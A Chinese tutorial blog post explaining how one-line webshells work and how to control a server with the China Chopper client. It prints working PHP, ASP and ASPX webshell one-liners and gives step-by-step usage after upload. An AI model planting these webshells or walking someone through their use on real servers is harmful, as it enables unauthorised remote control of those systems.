一句话木马拿shell原理及菜刀的使用
虽然网上这种文章很多了,但自己不总结一遍不踏实。
一、一句话木马
原理
1.以PHP举例
php的eval()函数:eval($str)函数是把$str当做PHP代码执行。
比如:
<?php
$a = 233;
$str = "echo $a;";
eval($str);
?>
输出结果:233
asp、aspx和php的此函数类似。
2.一句话木马:
php:<?php eval($_POST["kxc"]);?>
asp:<% eval request("kxc") %>
或 <%execute(request("kxc"))%>
asxp:<%@ Page Lanuage="Jscript"%><%eval(Request.Item["kxc"])%>
3.菜刀拿shell原理:小马上传大马
菜刀通过kxc(即上述参数)进行http请求,用经过base64编码的php(asp,aspx)代码来执行命令。
可以参考下面这篇文章,解析的很详细:
http://www.myhack58.com/Article/html/3/8/2013/40323_6.htm
数据库模块可参考这篇文章:
https://www.t00ls.net/articles-28388.html
二、菜刀的使用
1.上传好一句话木马。
2.打开菜刀,点击右键添加:
3.将一句话木马的url填写,在连接后面text框写一句话木马的参数,在配置里选好语言类型,点击添加。
4.添加后可以看到有新加的一行,右击选择相应的操作。
一句话木马拿shell原理及菜刀的使用相关推荐
- 一句话木马的工作原理
一句话木马的工作原理:一句话木马分析服务端与客户端. "一句话木马"服务端(是用于本地的html提交脚本木马文件) 就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp ...
- php一句话工作原理,一句话木马的工作原理
一句话木马的工作原理:一句话木马分析服务端与客户端. '一句话木马'服务端(是用于本地的html提交脚本木马文件) 就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件) ...
- MSF模拟渗透测试之一句话木马拿shell
MSF模拟渗透测试之一句话木马拿shell 文章目录 MSF模拟渗透测试之一句话木马拿shell 前言 一.利用命令执行漏洞,生成一句话木马文件 二.利用一句话木马拿shell 1.复制当前网址到蚁剑 ...
- 「渗透」:一句话木马反弹shell的思路
前提:现在情况是已经上传了一句话木马,可以执行命令如:ls,pwd,whoami等:问题在于,不管用python.bash还是perl都反弹不了,偷不了懒,就上msf把. http://target- ...
- 一句话木马拿Shell与菜刀原理
一.拿Shell的技巧 1. 直接上传asp asa jsp cer php aspx htr cdx 格式的木马,不行就加个空格或是利用IIS6.0解析漏洞,常见格式:1.asp;1.jpg 或 1 ...
- asp一句话木马原理
一句话木马入侵原理 <%execute request("#")%>是典型的一句话木马服务端代码,将这个代码写入asp文件,就成了一句话木马服务端文件. 仔细观察一下 ...
- 除了文件上传还有哪些方式可以写一句话木马?
除了文件上传还有哪些方式可以写一句话木马? 一句话木马如果上传到服务器的话,有啥危害学过网络安全的人都知道.但是通常网上流传的方式都是通过文件上传来实现木马上传,实在太过老套,这里就教大家几个新的方式 ...
- php过waf 一句话,(转)一句话木马绕过WAF
在渗透测试的后期,为了维持权限.我们通常都会选择使用大小马或者通过添加账户等各种各样的方式给自己留个后门.但是事情总不是一帆风顺的,在上传一句话木马以及使用一句话木马的过程中我们要跟WAF斗智斗勇.今 ...
- mysql 一句话木马_通过mysql写入一句话木马
USEmysql;# MySQL 返回的查询结果为空(即零行). # MySQL 返回的查询结果为空(即零行).CREATE TABLEa( cmd1text NOT NULL);# MySQL 返回 ...
最新文章
- 2022-2028年中国离心机行业市场研究及前瞻分析报告
- 【ACM】杭电OJ 2090
- base target=_self/IE6、IE7 用法(转)
- 软件:推荐五款超级好用的电脑小众软件,值得收藏!
- 通过SQL Server操作MySQL的步骤和方法
- oracle事务数统计,Oracle 查询事务数
- 虚拟机使用桥接模式设置Linux静态IP
- 搭建DNS服务,正向解析域名
- 【keras】有关loss function的定义-返回的是`矩阵`还是`标量`
- 浅谈SEO翻倍提升网站流量
- apper安卓×××
- clock_gettime接口和linux时间系统
- java彩票程序_java程序设计 彩票购买抽奖程序 团队博客
- 软件测试之测试计划案例
- 开启固定拨号FDN功能,发送信息时如何做FDN检测
- Python爬取EF每日英语资源
- 手机如何测光照度_5分钟教你学会如何测光
- CUDA中的Warp Shuffle
- 新旧《西游记》人物造型大PK (转)
- windows 2003 下IIS没有ASP.NET 1.1.4322选项卡
热门文章
- spooling技术课程设计 linux环境,《SPOOLING技术模拟实现 操作系统原理课程设计》.doc...
- 今天差点爆粗口了,几乎天天给你打,也不知道有多少个号码,拉黑一个又换一个
- %6f 在c语言中的作用,最简单的C程序设计 1.实验目的 ①掌握C语言中使用最多的一种语..._考试资料网...
- 爬虫入门之handler与opener(三)
- 4khz的带宽是指什么意思_扬声器和耳机的Hz-KHz范围是什么意思?
- 上周热点回顾(3.21-3.27)
- 【HMS Core 6.0全球上线】华为钥匙环服务,打造跨应用跨形态无缝登录体验
- 游戏夜读 | 网络游戏怎么赚钱?
- Python旅游门票收费问题
- 口语学习大杂烩,收藏了吧,不实用你砍我